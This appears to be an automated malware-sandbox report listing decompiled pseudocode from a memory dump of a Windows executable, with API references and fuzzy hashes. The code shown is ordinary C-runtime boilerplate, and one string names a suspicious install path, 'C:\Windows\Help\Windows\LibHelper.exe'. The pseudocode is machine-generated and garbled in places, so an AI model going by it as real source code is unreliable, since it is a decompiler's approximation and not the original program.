    • API ID: FileWrite__fassign$ConsoleErrorLast
    • String ID:
    • API String ID: 4031098158-0
    • Opcode ID: 144cfeb9a23824d64f730b1b71cfd2aa3e0dd0d44782894467a8436e5b44eb9c
    • Instruction ID: 42e7fd6a3c0aeb5a988cf86943e12a0db35a8ff725bf52fc90c925b2838f8f52
    • Opcode Fuzzy Hash: 144cfeb9a23824d64f730b1b71cfd2aa3e0dd0d44782894467a8436e5b44eb9c
    • Instruction Fuzzy Hash: 84D1BB71D002599FDF11CFE8C884AEDBBB5BF48304F28816AE995FB241D631A902CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E01072A98(void* __ecx) {
    				void* _t4;
    				void* _t8;
    				void* _t11;
    				void* _t13;
    				void* _t14;
    				void* _t18;
    				void* _t23;
    				long _t24;
    				void* _t27;
    
    				_t13 = __ecx;
    				if( *0x1083030 != 0xffffffff) {
    					_t24 = GetLastError();
    					_t11 = E01072F5C(_t13, __eflags,  *0x1083030);
    					_t14 = _t23;
    					__eflags = _t11 - 0xffffffff;
    					if(_t11 == 0xffffffff) {
    						L5:
    						_t11 = 0;
    					} else {
    						__eflags = _t11;
    						if(__eflags == 0) {
    							_t4 = E01072F97(_t14, __eflags,  *0x1083030, 0xffffffff);
    							__eflags = _t4;
    							if(_t4 != 0) {
    								_push(0x28);
    								_t27 = E01074C2D();
    								_t18 = 1;
    								__eflags = _t27;
    								if(__eflags == 0) {
    									L8:
    									_t11 = 0;
    									E01072F97(_t18, __eflags,  *0x1083030, 0);
    								} else {
    									_t8 = E01072F97(_t18, __eflags,  *0x1083030, _t27);
    									_pop(_t18);
    									__eflags = _t8;
    									if(__eflags != 0) {
    										_t11 = _t27;
    										_t27 = 0;
    										__eflags = 0;
    									} else {
    										goto L8;
    									}
    								}
    								E010736D4(_t27);
    							} else {
    								goto L5;
    							}
    						}
    					}
    					SetLastError(_t24);
    					return _t11;
    				} else {
    					return 0;
    				}
    			}












    0x01072a98
    0x01072a9f
    0x01072ab2
    0x01072ab9
    0x01072abb
    0x01072abc
    0x01072abf
    0x01072ad8
    0x01072ad8
    0x01072ac1
    0x01072ac1
    0x01072ac3
    0x01072acd
    0x01072ad4
    0x01072ad6
    0x01072add
    0x01072ae6
    0x01072ae9
    0x01072aea
    0x01072aec
    0x01072b00
    0x01072b00
    0x01072b09
    0x01072aee
    0x01072af5
    0x01072afb
    0x01072afc
    0x01072afe
    0x01072b12
    0x01072b14
    0x01072b14
    0x00000000
    0x00000000
    0x00000000
    0x01072afe
    0x01072b17
    0x00000000
    0x00000000
    0x00000000
    0x01072ad6
    0x01072ac3
    0x01072b1f
    0x01072b29
    0x01072aa1
    0x01072aa3
    0x01072aa3

    APIs
    • GetLastError.KERNEL32(?,?,01072A8F,010721AA,01071CDF), ref: 01072AA6
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01072AB4
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01072ACD
    • SetLastError.KERNEL32(00000000,01072A8F,010721AA,01071CDF), ref: 01072B1F
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 472b810dcd556bc26d8c7fcf6800eaf6976142f2e4371a72b7b8999857ff08a0
    • Instruction ID: af87b838864bc6550b427b4b9efa7fa47523c3a6feabf8225815753991d22ad3
    • Opcode Fuzzy Hash: 472b810dcd556bc26d8c7fcf6800eaf6976142f2e4371a72b7b8999857ff08a0
    • Instruction Fuzzy Hash: AE012832B1D3126FA67529F8AC94B6A2B94FF51AB07300239F1E1991D4EF128802974C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E01072E03(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				signed int _t11;
    				WCHAR* _t12;
    				struct HINSTANCE__* _t16;
    				struct HINSTANCE__* _t18;
    				signed int* _t22;
    				signed int* _t26;
    				struct HINSTANCE__* _t29;
    				WCHAR* _t31;
    				void* _t32;
    
    				_t26 = _a4;
    				while(_t26 != _a8) {
    					_t11 =  *_t26;
    					_t22 = 0x1083cec + _t11 * 4;
    					_t29 =  *_t22;
    					if(_t29 == 0) {
    						_t12 =  *(0x107dcb0 + _t11 * 4);
    						_v8 = _t12;
    						_t29 = LoadLibraryExW(_t12, 0, 0x800);
    						if(_t29 != 0) {
    							L13:
    							 *_t22 = _t29;
    							if( *_t22 != 0) {
    								FreeLibrary(_t29);
    							}
    							L15:
    							_t16 = _t29;
    							L12:
    							return _t16;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L8:
    							 *_t22 = _t18 | 0xffffffff;
    							L9:
    							_t26 =  &(_t26[1]);
    							continue;
    						}
    						_t31 = _v8;
    						_t18 = E01074D38(_t31, L"api-ms-", 7);
    						_t32 = _t32 + 0xc;
    						if(_t18 == 0) {
    							goto L8;
    						}
    						_t18 = LoadLibraryExW(_t31, 0, 0);
    						_t29 = _t18;
    						if(_t29 != 0) {
    							goto L13;
    						}
    						goto L8;
    					}
    					if(_t29 != 0xffffffff) {
    						goto L15;
    					}
    					goto L9;
    				}
    				_t16 = 0;
    				goto L12;
    			}













    0x01072e0a
    0x01072e7e
    0x01072e0f
    0x01072e11
    0x01072e18
    0x01072e1c
    0x01072e25
    0x01072e34
    0x01072e3d
    0x01072e41
    0x01072e8a
    0x01072e8c
    0x01072e90
    0x01072e93
    0x01072e93
    0x01072e99
    0x01072e99
    0x01072e85
    0x01072e89
    0x01072e89
    0x01072e43
    0x01072e4c
    0x01072e76
    0x01072e79
    0x01072e7b
    0x01072e7b
    0x00000000
    0x01072e7b
    0x01072e4e
    0x01072e59
    0x01072e5e
    0x01072e63
    0x00000000
    0x00000000
    0x01072e6a
    0x01072e70
    0x01072e74
    0x00000000
    0x00000000
    0x00000000
    0x01072e74
    0x01072e21
    0x00000000
    0x00000000
    0x00000000
    0x01072e23
    0x01072e83
    0x00000000

    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,?,01072EC4,?,?,01083C94,00000000,?,01072FEF,00000004,InitializeCriticalSectionEx,0107DDA4,InitializeCriticalSectionEx,00000000), ref: 01072E93
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FreeLibrary
    • String ID: api-ms-
    • API String ID: 3664257935-2084034818
    • Opcode ID: b2de552de41a889eb589150fd2593bd16e2743211b515d38b48ac4807a0099bc
    • Instruction ID: 413fad05af24d4a09d1f717234781e021c953efe111715a89db65e461cff26f8
    • Opcode Fuzzy Hash: b2de552de41a889eb589150fd2593bd16e2743211b515d38b48ac4807a0099bc
    • Instruction Fuzzy Hash: 2911A332E01625ABDB735AAC9840B5D37D8AF017B0F150551F9C5FB284D775ED0087D9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E01073D2F(void* __ecx, intOrPtr _a4) {
    				signed int _v8;
    				_Unknown_base(*)()* _t8;
    				_Unknown_base(*)()* _t14;
    
    				_v8 = _v8 & 0x00000000;
    				_t8 =  &_v8;
    				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
    				if(_t8 != 0) {
    					_t8 = GetProcAddress(_v8, "CorExitProcess");
    					_t14 = _t8;
    					if(_t14 != 0) {
    						 *0x107d170(_a4);
    						_t8 =  *_t14();
    					}
    				}
    				if(_v8 != 0) {
    					return FreeLibrary(_v8);
    				}
    				return _t8;
    			}






    0x01073d35
    0x01073d39
    0x01073d44
    0x01073d4c
    0x01073d57
    0x01073d5d
    0x01073d61
    0x01073d68
    0x01073d6e
    0x01073d6e
    0x01073d70
    0x01073d75
    0x00000000
    0x01073d7a
    0x01073d81

    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,01073D24,?,?,01073CEC,?,?,?), ref: 01073D44
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01073D57
    • FreeLibrary.KERNEL32(00000000,?,?,01073D24,?,?,01073CEC,?,?,?), ref: 01073D7A
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 062e07221ffdee91f13bab1217d174b7a96242ce54113dc4f1296a6006436c89
    • Instruction ID: 225578bc2d3a5b9ca026255f10c3112e5198fb5bed34cf1e95530503e27530cb
    • Opcode Fuzzy Hash: 062e07221ffdee91f13bab1217d174b7a96242ce54113dc4f1296a6006436c89
    • Instruction Fuzzy Hash: 48F05E30E00218FBEB22ABE5EC09B9D7EB4AF00795F000095B581B6050CB758E01EB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E01077626(intOrPtr* _a4) {
    				intOrPtr _t6;
    				intOrPtr* _t21;
    				void* _t23;
    				void* _t24;
    				void* _t25;
    				void* _t26;
    				void* _t27;
    
    				_t21 = _a4;
    				if(_t21 != 0) {
    					_t23 =  *_t21 -  *0x10836f8; // 0x1083748
    					if(_t23 != 0) {
    						E01074D72(_t7);
    					}
    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x10836fc; // 0x10843fc
    					if(_t24 != 0) {
    						E01074D72(_t8);
    					}
    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1083700; // 0x10843fc
    					if(_t25 != 0) {
    						E01074D72(_t9);
    					}
    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1083728; // 0x108374c
    					if(_t26 != 0) {
    						E01074D72(_t10);
    					}
    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
    					_t27 = _t6 -  *0x108372c; // 0x1084400
    					if(_t27 != 0) {
    						return E01074D72(_t6);
    					}
    				}
    				return _t6;
    			}










    0x0107762c
    0x01077631
    0x01077635
    0x0107763b
    0x0107763e
    0x01077643
    0x01077647
    0x0107764d
    0x01077650
    0x01077655
    0x01077659
    0x0107765f
    0x01077662
    0x01077667
    0x0107766b
    0x01077671
    0x01077674
    0x01077679
    0x0107767a
    0x0107767d
    0x01077683
    0x00000000
    0x0107768b
    0x01077683
    0x0107768e

    APIs
    • _free.LIBCMT ref: 0107763E
      • Part of subcall function 01074D72: HeapFree.KERNEL32(00000000,00000000,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?), ref: 01074D88
      • Part of subcall function 01074D72: GetLastError.KERNEL32(?,?,010776B9,?,00000000,?,?,?,010776E0,?,00000007,?,?,01077BA2,?,?), ref: 01074D9A
    • _free.LIBCMT ref: 01077650
    • _free.LIBCMT ref: 01077662
    • _free.LIBCMT ref: 01077674
    • _free.LIBCMT ref: 01077686
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 87981a30dbe9ad8340206603f6173846d18565b8c1d1833909bdd3ff22ccdd4a
    • Instruction ID: e0be36770c549c475f319e4de1e89a3847fc7dc6e566430a23227ea3c8754304
    • Opcode Fuzzy Hash: 87981a30dbe9ad8340206603f6173846d18565b8c1d1833909bdd3ff22ccdd4a
    • Instruction Fuzzy Hash: B4F04F72C04641A79670FA6CE485D4B7BD9FA59B903544845E2C5DB604DB35FC80865C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E01073E01(void* __edx, intOrPtr _a4) {
    				signed int _v8;
    				struct HINSTANCE__* _v12;
    				char _v16;
    				WCHAR* _v20;
    				void* __ebx;
    				void* __edi;
    				WCHAR* _t25;
    				WCHAR** _t35;
    				WCHAR** _t36;
    				WCHAR* _t39;
    				WCHAR* _t41;
    				WCHAR* _t42;
    				intOrPtr* _t43;
    				WCHAR** _t44;
    				intOrPtr _t47;
    				WCHAR* _t48;
    				WCHAR* _t53;
    				void* _t56;
    				WCHAR** _t57;
    				WCHAR* _t63;
    				WCHAR* _t65;
    
    				_t56 = __edx;
    				_t47 = _a4;
    				if(_t47 != 0) {
    					__eflags = _t47 - 2;
    					if(_t47 == 2) {
    						L5:
    						GetModuleFileNameW(0, 0x1083d20, 0x104);
    						_t25 =  *0x10840ec; // 0xe21d40
    						 *0x10840d8 = 0x1083d20;
    						_v20 = _t25;
    						__eflags = _t25;
    						if(_t25 == 0) {
    							L7:
    							_t25 = 0x1083d20;
    							_v20 = 0x1083d20;
    							L8:
    							_v8 = 0;
    							_v16 = 0;
    							_t63 = E010740C5(E01073F30(_t25, 0, 0,  &_v8,  &_v16), _v8, _v16, 2);
    							__eflags = _t63;
    							if(__eflags != 0) {
    								E01073F30(_v20, _t63, _t63 + _v8 * 4,  &_v8,  &_v16);
    								__eflags = _t47 - 1;
    								if(_t47 != 1) {
    									_v12 = 0;
    									_push( &_v12);
    									_t48 = E01075A17(_t47, _t56, 0, _t63);
    									__eflags = _t48;
    									if(_t48 == 0) {
    										_t57 = _v12;
    										_t53 = 0;
    										_t35 = _t57;
    										__eflags =  *_t57;
    										if( *_t57 == 0) {
    											L17:
    											_t36 = 0;
    											 *0x10840dc = _t53;
    											_v12 = 0;
    											_t48 = 0;
    											 *0x10840e4 = _t57;
    											L18:
    											E01074D72(_t36);
    											_v12 = 0;
    											L19:
    											E01074D72(_t63);
    											_t39 = _t48;
    											L20:
    											return _t39;
    										} else {
    											goto L16;
    										}
    										do {
    											L16:
    											_t35 =  &(_t35[1]);
    											_t53 =  &(_t53[0]);
    											__eflags =  *_t35;
    										} while ( *_t35 != 0);
    										goto L17;
    									}
    									_t36 = _v12;
    									goto L18;
    								}
    								_t41 = _v8 - 1;
    								__eflags = _t41;
    								 *0x10840dc = _t41;
    								_t42 = _t63;
    								_t63 = 0;
    								 *0x10840e4 = _t42;
    								L12:
    								_t48 = 0;
    								goto L19;
    							}
    							_t43 = E01073958(__eflags);
    							_push(0xc);
    							_pop(0);
    							 *_t43 = 0;
    							goto L12;
    						}
    						__eflags =  *_t25;
    						if( *_t25 != 0) {
    							goto L8;
    						}
    						goto L7;
    					}
    					__eflags = _t47 - 1;
    					if(__eflags == 0) {
    						goto L5;
    					}
    					_t44 = E01073958(__eflags);
    					_t65 = 0x16;
    					 *_t44 = _t65;
    					E0107389B();
    					_t39 = _t65;
    					goto L20;
    				}
    				return 0;
    			}
























    0x01073e01
    0x01073e0a
    0x01073e0f
    0x01073e19
    0x01073e1c
    0x01073e39
    0x01073e48
    0x01073e4e
    0x01073e53
    0x01073e59
    0x01073e5c
    0x01073e5e
    0x01073e65
    0x01073e65
    0x01073e67
    0x01073e6a
    0x01073e6d
    0x01073e74
    0x01073e8d
    0x01073e92
    0x01073e94
    0x01073eb5
    0x01073ebd
    0x01073ec0
    0x01073edb
    0x01073ede
    0x01073ee5
    0x01073ee9
    0x01073eeb
    0x01073ef2
    0x01073ef5
    0x01073ef7
    0x01073ef9
    0x01073efb
    0x01073f05
    0x01073f05
    0x01073f07
    0x01073f0d
    0x01073f10
    0x01073f12
    0x01073f18
    0x01073f19
    0x01073f1f
    0x01073f22
    0x01073f23
    0x01073f29
    0x01073f2c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x01073efd
    0x01073efd
    0x01073efd
    0x01073f00
    0x01073f01
    0x01073f01
    0x00000000
    0x01073efd
    0x01073eed
    0x00000000
    0x01073eed
    0x01073ec5
    0x01073ec5
    0x01073ec6
    0x01073ecb
    0x01073ecd
    0x01073ecf
    0x01073ed4
    0x01073ed4
    0x00000000
    0x01073ed4
    0x01073e96
    0x01073e9b
    0x01073e9d
    0x01073e9e
    0x00000000
    0x01073e9e
    0x01073e60
    0x01073e63
    0x00000000
    0x00000000
    0x00000000
    0x01073e63
    0x01073e1e
    0x01073e21
    0x00000000
    0x00000000
    0x01073e23
    0x01073e2a
    0x01073e2b
    0x01073e2d
    0x01073e32
    0x00000000
    0x01073e32
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: C:\Windows\Help\Windows\LibHelper.exe
    • API String ID: 0-2763731058
    • Opcode ID: 085808598ad6abe789910fad5d4b52a09bb217fcb9db4f252e6235b3fb73cc75
    • Instruction ID: 0b75ba71f6866a18535db71cc2bc19f4ddd1b6e6a3953c2aafbb5e34a20cf136
    • Opcode Fuzzy Hash: 085808598ad6abe789910fad5d4b52a09bb217fcb9db4f252e6235b3fb73cc75
    • Instruction Fuzzy Hash: 5A31A071E04259EBEB22DF9D8884AAFBBF8FB94300B1044A6F5C1EB240D7719A41DB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0107A2A4(void* __eflags, signed int _a4) {
    				intOrPtr _t13;
    				void* _t21;
    				signed int _t33;
    				long _t35;
    
    				_t33 = _a4;
    				if(E010774BE(_t33) != 0xffffffff) {
    					_t13 =  *0x10841d0; // 0xe36468
    					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
    						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
    							goto L7;
    						} else {
    							goto L6;
    						}
    					} else {
    						L6:
    						_t21 = E010774BE(2);
    						if(E010774BE(1) == _t21) {
    							goto L1;
    						}
    						L7:
    						if(CloseHandle(E010774BE(_t33)) != 0) {
    							goto L1;
    						}
    						_t35 = GetLastError();
    						L9:
    						E0107742D(_t33);
    						 *((char*)( *((intOrPtr*)(0x10841d0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
    						if(_t35 == 0) {
    							return 0;
    						}
    						return E01073922(_t35) | 0xffffffff;
    					}
    				}
    				L1:
    				_t35 = 0;
    				goto L9;
    			}







    0x0107a2ab
    0x0107a2b8
    0x0107a2be
    0x0107a2c6
    0x0107a2d4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0107a2dc
    0x0107a2dc
    0x0107a2de
    0x0107a2f0
    0x00000000
    0x00000000
    0x0107a2f2
    0x0107a302
    0x00000000
    0x00000000
    0x0107a30a
    0x0107a30c
    0x0107a30d
    0x0107a325
    0x0107a32c
    0x00000000
    0x0107a33a
    0x00000000
    0x0107a335
    0x0107a2c6
    0x0107a2ba
    0x0107a2ba
    0x00000000

    APIs
    • CloseHandle.KERNEL32(00000000,00000000,?,?,0107A1D2,?,01082580,0000000C,0107A284,?,?,?), ref: 0107A2FA
    • GetLastError.KERNEL32(?,0107A1D2,?,01082580,0000000C,0107A284,?,?,?), ref: 0107A304
    • __dosmaperr.LIBCMT ref: 0107A32F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
    • Associated: 00000001.00000002.462433208.0000000001070000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462469940.000000000107D000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.462490843.0000000001083000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.462499188.0000000001085000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CloseErrorHandleLast__dosmaperr
    • String ID: hd
    • API String ID: 2583163307-2937536798
    • Opcode ID: 9f51ed672d963fc0e13b5de099058516f5a676b5704f5f768d251624ca0584d5
    • Instruction ID: b8a0abbb59cea7f2eba537408d51face6843e3c0525607326db2e729079c6f13
    • Opcode Fuzzy Hash: 9f51ed672d963fc0e13b5de099058516f5a676b5704f5f768d251624ca0584d5
    • Instruction Fuzzy Hash: B3010832F041309BD662237C68487AE3B859BD2674F2D4189EDD5972C2EF668C8242AC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E010750EA(void* __ecx, void* __edx) {
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t2;
    				long _t3;
    				intOrPtr _t5;
    				long _t6;
    				intOrPtr _t9;
    				long _t10;
    				signed int _t39;
    				signed int _t40;
    				void* _t43;
    				void* _t49;
    				signed int _t51;
    				signed int _t53;
    				signed int _t54;
    				long _t56;
    				long _t60;
    				long _t61;
    				void* _t65;
    
    				_t49 = __edx;
    				_t43 = __ecx;
    				_t60 = GetLastError();
    				_t2 =  *0x1083060; // 0x5
    				_t67 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E010766B7(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t51 = E010754A9(1, 0x364);
    						_pop(_t43);
    						__eflags = _t51;
    						if(__eflags != 0) {
    							__eflags = E010766B7(__eflags,  *0x1083060, _t51);
    							if(__eflags != 0) {
    								E01074F18(_t51, 0x10843e4);
    								E01074D72(0);
    								_t65 = _t65 + 0xc;
    								goto L13;
    							} else {
    								_t39 = 0;
    								E010766B7(__eflags,  *0x1083060, 0);
    								_push(_t51);
    								goto L9;
    							}
    						} else {
    							_t39 = 0;
    							__eflags = 0;
    							E010766B7(0,  *0x1083060, 0);
    							_push(0);
    							L9:
    							E01074D72();
    							_pop(_t43);
    							goto L4;
    						}
    					}
    				} else {
    					_t51 = E01076678(_t67, _t2);
    					if(_t51 == 0) {
    						_t2 =  *0x1083060; // 0x5
    						goto L6;
    					} else {
    						if(_t51 != 0xffffffff) {
    							L13:
    							_t39 = _t51;
    						} else {
    							L3:
    							_t39 = 0;
    							L4:
    							_t51 = _t39;
    						}
    					}
    				}
    				SetLastError(_t60);
    				asm("sbb edi, edi");
    				_t53 =  ~_t51 & _t39;
    				if(_t53 == 0) {
    					E01074BE9(_t39, _t43, _t49, _t60);
    					asm("int3");
    					_t5 =  *0x1083060; // 0x5
    					_push(_t60);
    					__eflags = _t5 - 0xffffffff;
    					if(__eflags == 0) {
    						L22:
    						_t6 = E010766B7(__eflags, _t5, 0xffffffff);
    						__eflags = _t6;
    						if(_t6 == 0) {
    							goto L31;
    						} else {
    							_t60 = E010754A9(1, 0x364);
    							_pop(_t43);
    							__eflags = _t60;
    							if(__eflags != 0) {
    								__eflags = E010766B7(__eflags,  *0x1083060, _t60);
    								if(__eflags != 0) {
    									E01074F18(_t60, 0x10843e4);
    									E01074D72(0);
    									_t65 = _t65 + 0xc;
    									goto L29;
    								} else {
    									E010766B7(__eflags,  *0x1083060, _t21);
    									_push(_t60);
    									goto L25;
    								}
    							} else {
    								E010766B7(__eflags,  *0x1083060, _t20);
    								_push(_t60);
    								L25:
    								E01074D72();
    								_pop(_t43);
    								goto L31;
    							}
    						}
    					} else {
    						_t60 = E01076678(__eflags, _t5);
    						__eflags = _t60;
    						if(__eflags == 0) {
    							_t5 =  *0x1083060; // 0x5
    							goto L22;
    						} else {
    							__eflags = _t60 - 0xffffffff;
    							if(_t60 == 0xffffffff) {
    								L31:
    								E01074BE9(_t39, _t43, _t49, _t60);
    								asm("int3");
    								_push(_t39);
    								_push(_t60);
    								_push(_t53);
    								_t61 = GetLastError();
    								_t9 =  *0x1083060; // 0x5
    								__eflags = _t9 - 0xffffffff;
    								if(__eflags == 0) {
    									L38:
    									_t10 = E010766B7(__eflags, _t9, 0xffffffff);
    									__eflags = _t10;
    									if(_t10 == 0) {
    										goto L35;
    									} else {
    										_t54 = E010754A9(1, 0x364);
    										__eflags = _t54;
    										if(__eflags != 0) {
    											__eflags = E010766B7(__eflags,  *0x1083060, _t54);
    											if(__eflags != 0) {
    												E01074F18(_t54, 0x10843e4);
    												E01074D72(0);
    												goto L45;
    											} else {
    												_t40 = 0;
    												E010766B7(__eflags,  *0x1083060, 0);
    												_push(_t54);
    												goto L41;
    											}
    										} else {
    											_t40 = 0;
    											__eflags = 0;
    											E010766B7(0,  *0x1083060, 0);
    											_push(0);
    											L41:
    											E01074D72();
    											goto L36;
    										}
    									}
    								} else {
    									_t54 = E01076678(__eflags, _t9);
    									__eflags = _t54;
    									if(__eflags == 0) {
    										_t9 =  *0x1083060; // 0x5
    										goto L38;
    									} else {
    										__eflags = _t54 - 0xffffffff;
    										if(_t54 != 0xffffffff) {
    											L45:
    											_t40 = _t54;
    										} else {
    											L35:
    											_t40 = 0;
    											__eflags = 0;
    											L36:
    											_t54 = _t40;
    										}
    									}
    								}
    								SetLastError(_t61);
    								asm("sbb edi, edi");
    								_t56 =  ~_t54 & _t40;
    								__eflags = _t56;
    								return _t56;
    							} else {
    								L29:
    								__eflags = _t60;
    								if(_t60 == 0) {
    									goto L31;
    								} else {
    									return _t60;
    								}
    							}
    						}
    					}
    				} else {
    					return _t53;
    				}
    			}






















    0x010750ea
    0x010750ea
    0x010750f5
    0x010750f7
    0x010750fc
    0x010750ff
    0x0107511d
    0x01075120
    0x01075125
    0x01075127
    0x00000000
    0x01075129
    0x01075135
    0x01075138
    0x01075139
    0x0107513b
    0x01075160
    0x01075162
    0x0107517b
    0x01075182
    0x01075187
    0x00000000
    0x01075164
    0x01075164
    0x0107516d
    0x01075172
    0x00000000
    0x01075172
    0x0107513d
    0x0107513d
    0x0107513d
    0x01075146
    0x0107514b
    0x0107514c
    0x0107514c
    0x01075151
    0x00000000
    0x01075151
    0x0107513b
    0x01075101
    0x01075107
    0x0107510b
    0x01075118
    0x00000000
    0x0107510d
    0x01075110
    0x0107518a
    0x0107518a
    0x01075112
    0x01075112
    0x01075112
    0x01075114
    0x01075114
    0x01075114
    0x01075110
    0x0107510b
    0x0107518d
    0x01075195
    0x01075197
    0x01075199
    0x010751a1
    0x010751a6
    0x010751a7
    0x010751ac
    0x010751ad
    0x010751b0
    0x010751ca
    0x010751cd
    0x010751d2
    0x010751d4
    0x00000000
    0x010751d6
    0x010751e2
    0x010751e5
    0x010751e6
    0x010751e8
    0x0107520b
    0x0107520d
    0x01075224
    0x0107522b
    0x01075230
    0x00000000
    0x0107520f
    0x01075216
    0x0107521b
    0x00000000
    0x0107521b
    0x010751ea
    0x010751f1
    0x010751f6
    0x010751f7
    0x010751f7
    0x010751fc
    0x00000000
    0x010751fc
    0x010751e8
    0x010751b2
    0x010751b8
    0x010751ba
    0x010751bc
    0x010751c5
    0x00000000
    0x010751be
    0x010751be
    0x010751c1
    0x0107523b
    0x0107523b
    0x01075240
    0x01075243
    0x01075244
    0x01075245
    0x0107524c
    0x0107524e
    0x01075253
    0x01075256
    0x01075274
    0x01075277
    0x0107527c
    0x0107527e
    0x00000000
    0x01075280
    0x0107528c
    0x01075290
    0x01075292
    0x010752b7
    0x010752b9
    0x010752d2
    0x010752d9
    0x00000000
    0x010752bb
    0x010752bb
    0x010752c4
    0x010752c9
    0x00000000
    0x010752c9
    0x01075294
    0x01075294
    0x01075294
    0x0107529d
    0x010752a2
    0x010752a3
    0x010752a3
    0x00000000
    0x010752a8
    0x01075292
    0x01075258
    0x0107525e
    0x01075260
    0x01075262
    0x0107526f
    0x00000000
    0x01075264
    0x01075264
    0x01075267
    0x010752e1
    0x010752e1
    0x01075269
    0x01075269
    0x01075269
    0x01075269
    0x0107526b
    0x0107526b
    0x0107526b
    0x01075267
    0x01075262
    0x010752e4
    0x010752ec
    0x010752ee
    0x010752ee
    0x010752f5
    0x010751c3
    0x01075233
    0x01075233
    0x01075235
    0x00000000
    0x01075237
    0x0107523a
    0x0107523a
    0x01075235
    0x010751c1
    0x010751bc
    0x0107519b
    0x010751a0
    0x010751a0

    APIs
    • GetLastError.KERNEL32(?,?,?,01079043,?,00000001,01076F6B,?,01079502,00000001,?,?,?,01076EFA,?,?), ref: 010750EF
    • _free.LIBCMT ref: 0107514C
    • _free.LIBCMT ref: 01075182
    • SetLastError.KERNEL32(00000000,00000005,000000FF,?,01079502,00000001,?,?,?,01076EFA,?,?,?,01082480,0000002C,01076F6B), ref: 0107518D
    Memory Dump Source
    • Source File: 00000001.00000002.462439635.0000000001071000.00000020.00020000.sdmp, Offset: 01070000, based on PE: true
